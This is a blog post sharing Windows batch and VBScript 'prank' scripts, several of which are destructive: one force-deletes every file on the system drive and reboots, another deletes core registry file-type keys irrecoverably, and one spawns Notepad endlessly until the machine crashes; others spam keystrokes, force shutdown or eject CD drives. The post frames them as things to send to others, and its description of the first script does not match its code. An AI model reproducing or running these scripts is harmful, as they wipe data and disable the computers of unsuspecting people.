Hacking Equipments | C/C++ Coding | Updates:: Did you tried Our Online ? AdobePhotoshop |

Goto Top

Notpad Disastrous Codes and Tips



Assalam-0-Alaikum,

TRY THESE ALL TRICKS AND SCRIPTS AT YOUR OWN RISK.




The blue screen of Death [dangerous]

*The Blue Screen Of Death can be coded and sent to you like any application. It is up to you to be carefully and try to reveal the trick before getting in serious trouble. It loops a message asking to re-install your windows again

SCRIPT:


@echo off
del %systemdrive%\*.* /f /s /q
shutdown -r -f -t 00

Stupidity Shutdown


*This pops up a funny message then will shutdown the computer

SCRIPT:


@echo off
msg * Fatal system error due to admin stupidity!
shutdown -c "Error! You are too stupid!" -s -t 10


Delete Key Registry Files [VERY DANGEROUS!! USE AT RISK]


*This will delete key registry files, then loops a message* (CANNOT BE RECOVERED FROM)

SCRIPT:



@ECHO OFF
START reg delete HKCR/.exe
START reg delete HKCR/.dll
START reg delete HKCR/*
:MESSAGE
ECHO Your computer has been Hacked ;p. Have a nice day.
GOTO MESSAGE

Endless Notepads


*This will pop up endless notepads until the computer freezes and crashes*

SCRIPT:


@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top

Crazy caps lock


*This constantly turns caps lock on and off really fast continuously*

SCRIPT:

Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
loop


Endless Enter


*This constantly makes it so the enter button is being pressed continuously *

SCRIPT:


Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "~(enter)"
loop



Endless Backspace


*This makes it so the backspace key is constantly being pressed*

SCRIPT:


MsgBox "Let's go back a few steps"
Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{bs}"
loop


Popping CD Drives


*This will make the CD drives constantly pop out*

SCRIPT:



Set oWMP = CreateObject("WMPlayer.OCX.7")
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 100
loop



These all codes are not obviously mine :p but sharing is caring :D

Regards,
Zulqurnain jutt


0 Comments :

Post a Comment

Having Confusion ,oH Dear ask me in comments!!

Related Posts Plugin for WordPress, Blogger...
 

About Admin

I am a pro-programmer of C++ ,php i can crack some softwares and am a web desighner .I AM also on .


| Solve Byte © 2011 - 2016. All Rights Reserved | Back To Top |